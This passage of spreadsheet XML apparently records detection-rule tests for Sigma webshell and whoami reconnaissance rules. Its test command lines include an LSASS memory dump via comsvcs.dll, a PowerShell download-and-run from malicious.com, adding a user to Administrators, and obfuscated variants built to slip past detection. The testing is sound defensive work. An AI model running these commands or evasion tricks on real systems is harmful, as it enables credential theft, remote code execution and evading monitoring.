      <c r="F625" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G625" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H625" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I625" s="36" t="n"/>
      <c r="J625" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K625" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="626" ht="15.75" customHeight="1" s="42">
      <c r="A626" s="43" t="n"/>
      <c r="B626" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C626" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D626" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E626" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\comsvcs.dll C:\Windows\Temp\c.dll &amp;&amp; rundll32.exe C:\Windows\Temp\c.dll, MiniDump 500 lsass.bin</t>
        </is>
      </c>
      <c r="F626" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G626" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H626" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I626" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J626" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K626" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="627" ht="15.75" customHeight="1" s="42">
      <c r="A627" s="43" t="n"/>
      <c r="B627" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C627" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D627" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E627" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F627" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G627" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H627" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I627" s="43" t="n"/>
      <c r="J627" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K627" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="628" ht="15.75" customHeight="1" s="42">
      <c r="A628" s="43" t="n"/>
      <c r="B628" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C628" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D628" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E628" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F628" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G628" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H628" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I628" s="43" t="n"/>
      <c r="J628" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K628" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="629" ht="15.75" customHeight="1" s="42">
      <c r="A629" s="43" t="n"/>
      <c r="B629" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C629" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D629" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E629" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F629" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G629" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H629" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I629" s="43" t="n"/>
      <c r="J629" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K629" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="630" ht="15.75" customHeight="1" s="42">
      <c r="A630" s="43" t="n"/>
      <c r="B630" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C630" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D630" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E630" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F630" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G630" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H630" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I630" s="36" t="n"/>
      <c r="J630" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K630" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="631" ht="15.75" customHeight="1" s="42">
      <c r="A631" s="43" t="n"/>
      <c r="B631" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C631" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D631" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E631" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F631" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G631" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H631" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I631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631" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K631" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="632" ht="15.75" customHeight="1" s="42">
      <c r="A632" s="43" t="n"/>
      <c r="B632" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C632" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D632" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E632" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -cOmMaNd "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F632" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G632" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H632" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I632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632" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K632" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="633" ht="15.75" customHeight="1" s="42">
      <c r="A633" s="43" t="n"/>
      <c r="B633" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C633" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D633" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E633" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nOpRoFiLE -COmmAnD "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F633" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G633" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H633" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I633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633" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K633" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="634" ht="15.75" customHeight="1" s="42">
      <c r="A634" s="43" t="n"/>
      <c r="B634" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C634" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D634" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E634" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nopRoFIle -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F634" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G634" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H634" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I634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634" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K634" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="635" ht="15.75" customHeight="1" s="42">
      <c r="A635" s="43" t="n"/>
      <c r="B635" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C635" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D635" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E635" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -noprOFiLe -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F635" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G635" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H635" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I635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635" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K635" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="636" ht="15.75" customHeight="1" s="42">
      <c r="A636" s="43" t="n"/>
      <c r="B636" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C636" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D636" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E636" s="36" t="inlineStr">
        <is>
          <t>ping.exe /n 4 10.10.10.10</t>
        </is>
      </c>
      <c r="F636" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G636" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H636" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I636" s="36" t="n"/>
      <c r="J636" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K636" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="637" ht="15.75" customHeight="1" s="42">
      <c r="A637" s="43" t="n"/>
      <c r="B637" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C637" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D637" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E637" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ec JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F637" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G637" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H637" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I637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637" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K637" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="638" ht="15.75" customHeight="1" s="42">
      <c r="A638" s="43" t="n"/>
      <c r="B638" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C638" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D638" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E638" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eC JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F638" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G638" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H638" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I638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638" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K638" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="639" ht="15.75" customHeight="1" s="42">
      <c r="A639" s="43" t="n"/>
      <c r="B639" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C639" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D639" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E639" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Ec JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F639" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G639" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H639" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I639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639" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K639" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="640" ht="15.75" customHeight="1" s="42">
      <c r="A640" s="43" t="n"/>
      <c r="B640" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C640" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D640" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E640" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe -"c" "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F640" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G640" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H640" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I640" s="36" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8)</t>
        </is>
      </c>
      <c r="J640" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K640" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="641" ht="15.75" customHeight="1" s="42">
      <c r="A641" s="43" t="n"/>
      <c r="B641" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C641" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D641" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E641" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /"c" "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F641" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G641" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H641" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I641" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8)</t>
        </is>
      </c>
      <c r="J641" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K641" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="642" ht="15.75" customHeight="1" s="42">
      <c r="A642" s="43" t="n"/>
      <c r="B642" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C642" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D642" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E642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642" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G642" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H642" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I642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642" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K642" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="643" ht="15.75" customHeight="1" s="42">
      <c r="A643" s="43" t="n"/>
      <c r="B643" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C643" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D643" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E643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643" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G643" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H643" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I643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643" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K643" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="644" ht="15.75" customHeight="1" s="42">
      <c r="A644" s="43" t="n"/>
      <c r="B644" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C644" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D644" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E644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644" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G644" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H644" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I64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644" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K644" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="645" ht="15.75" customHeight="1" s="42">
      <c r="A645" s="43" t="n"/>
      <c r="B645" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_all_execution</t>
        </is>
      </c>
      <c r="C645" s="36" t="inlineStr">
        <is>
          <t>Enumerate All Information With Whoami.EXE</t>
        </is>
      </c>
      <c r="D645" s="36" t="inlineStr">
        <is>
          <t>c248c896-e412-4279-8c15-1c558067b6fa</t>
        </is>
      </c>
      <c r="E645" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c whoami /"a^l^l"</t>
        </is>
      </c>
      <c r="F645" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G645" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H645" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I645" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J645" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K645" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="646" ht="15.75" customHeight="1" s="42">
      <c r="A646" s="43" t="n"/>
      <c r="B646" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_all_execution</t>
        </is>
      </c>
      <c r="C646" s="36" t="inlineStr">
        <is>
          <t>Enumerate All Information With Whoami.EXE</t>
        </is>
      </c>
      <c r="D646" s="36" t="inlineStr">
        <is>
          <t>c248c896-e412-4279-8c15-1c558067b6fa</t>
        </is>
      </c>
      <c r="E646" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c whoami -"a^l^l"</t>
        </is>
      </c>
      <c r="F646" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G646" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H646" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I646" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J646" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K646" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="647" ht="15.75" customHeight="1" s="42">
      <c r="A647" s="43" t="n"/>
      <c r="B647" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_all_execution</t>
        </is>
      </c>
      <c r="C647" s="36" t="inlineStr">
        <is>
          <t>Enumerate All Information With Whoami.EXE</t>
        </is>
      </c>
      <c r="D647" s="36" t="inlineStr">
        <is>
          <t>c248c896-e412-4279-8c15-1c558067b6fa</t>
        </is>
      </c>
      <c r="E647" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Security.Principal.WindowsIdentity]::GetCurrent().Groups | ForEach-Object { $_.Translate([System.Security.Principal.NTAccount]) }"</t>
        </is>
      </c>
      <c r="F647" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G647" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H647" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I647" s="43" t="n"/>
      <c r="J647" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K647" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="648" ht="15.75" customHeight="1" s="42">
      <c r="A648" s="43" t="n"/>
      <c r="B648" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_all_execution</t>
        </is>
      </c>
      <c r="C648" s="36" t="inlineStr">
        <is>
          <t>Enumerate All Information With Whoami.EXE</t>
        </is>
      </c>
      <c r="D648" s="36" t="inlineStr">
        <is>
          <t>c248c896-e412-4279-8c15-1c558067b6fa</t>
        </is>
      </c>
      <c r="E648" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Security.Principal.WindowsIdentity]::GetCurrent().Groups | ForEach-Object { $_.Translate([System.Security.Principal.NTAccount]) }"</t>
        </is>
      </c>
      <c r="F648" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G648" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H648" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I648" s="36" t="n"/>
      <c r="J648" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K648" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="649" ht="15.75" customHeight="1" s="42">
      <c r="A649" s="43" t="n"/>
      <c r="B649" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_all_execution</t>
        </is>
      </c>
      <c r="C649" s="36" t="inlineStr">
        <is>
          <t>Enumerate All Information With Whoami.EXE</t>
        </is>
      </c>
      <c r="D649" s="36" t="inlineStr">
        <is>
          <t>c248c896-e412-4279-8c15-1c558067b6fa</t>
        </is>
      </c>
      <c r="E649" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmAND "[Security.Principal.WindowsIdentity]::GetCurrent().Groups | ForEach-Object { $_.Translate([System.Security.Principal.NTAccount]) }"</t>
        </is>
      </c>
      <c r="F649" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G649" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H649" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I649" s="36" t="n"/>
      <c r="J649" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K649" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="650" ht="15.75" customHeight="1" s="42">
      <c r="A650" s="43" t="n"/>
      <c r="B650" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_all_execution</t>
        </is>
      </c>
      <c r="C650" s="36" t="inlineStr">
        <is>
          <t>Enumerate All Information With Whoami.EXE</t>
        </is>
      </c>
      <c r="D650" s="36" t="inlineStr">
        <is>
          <t>c248c896-e412-4279-8c15-1c558067b6fa</t>
        </is>
      </c>
      <c r="E650" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMaNd "[Security.Principal.WindowsIdentity]::GetCurrent().Groups | ForEach-Object { $_.Translate([System.Security.Principal.NTAccount]) }"</t>
        </is>
      </c>
      <c r="F650" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G650" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H650" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I650" s="36" t="n"/>
      <c r="J650" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K650" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="651" ht="15.75" customHeight="1" s="42">
      <c r="A651" s="43" t="n"/>
      <c r="B651" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_groups_discovery</t>
        </is>
      </c>
      <c r="C651" s="36" t="inlineStr">
        <is>
          <t>Group Membership Reconnaissance Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D651" s="36" t="inlineStr">
        <is>
          <t>bd8b828d-0dca-48e1-8a63-8a58ecf2644f</t>
        </is>
      </c>
      <c r="E651" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" whoami -"g^roups"</t>
        </is>
      </c>
      <c r="F651" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G651" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H651" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I651" s="36" t="n"/>
      <c r="J651" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K651" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="652" ht="15.75" customHeight="1" s="42">
      <c r="A652" s="43" t="n"/>
      <c r="B652" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_groups_discovery</t>
        </is>
      </c>
      <c r="C652" s="36" t="inlineStr">
        <is>
          <t>Group Membership Reconnaissance Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D652" s="36" t="inlineStr">
        <is>
          <t>bd8b828d-0dca-48e1-8a63-8a58ecf2644f</t>
        </is>
      </c>
      <c r="E652" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c whoami /"g^roups"</t>
        </is>
      </c>
      <c r="F652" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G652" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H652" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I652" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J652" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K652" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="653" ht="15.75" customHeight="1" s="42">
      <c r="A653" s="43" t="n"/>
      <c r="B653" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_groups_discovery</t>
        </is>
      </c>
      <c r="C653" s="36" t="inlineStr">
        <is>
          <t>Group Membership Reconnaissance Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D653" s="36" t="inlineStr">
        <is>
          <t>bd8b828d-0dca-48e1-8a63-8a58ecf2644f</t>
        </is>
      </c>
      <c r="E653" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C whoami -"g^roups"</t>
        </is>
      </c>
      <c r="F653" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G653" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H653" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I653" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J653" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K653" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="654" ht="15.75" customHeight="1" s="42">
      <c r="A654" s="43" t="n"/>
      <c r="B654" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_groups_discovery</t>
        </is>
      </c>
      <c r="C654" s="36" t="inlineStr">
        <is>
          <t>Group Membership Reconnaissance Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D654" s="36" t="inlineStr">
        <is>
          <t>bd8b828d-0dca-48e1-8a63-8a58ecf2644f</t>
        </is>
      </c>
      <c r="E654" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" whoami /G^ROups</t>
        </is>
      </c>
      <c r="F654" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G654" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H654" s="36" t="b">
        <v>1</v>
      </c>
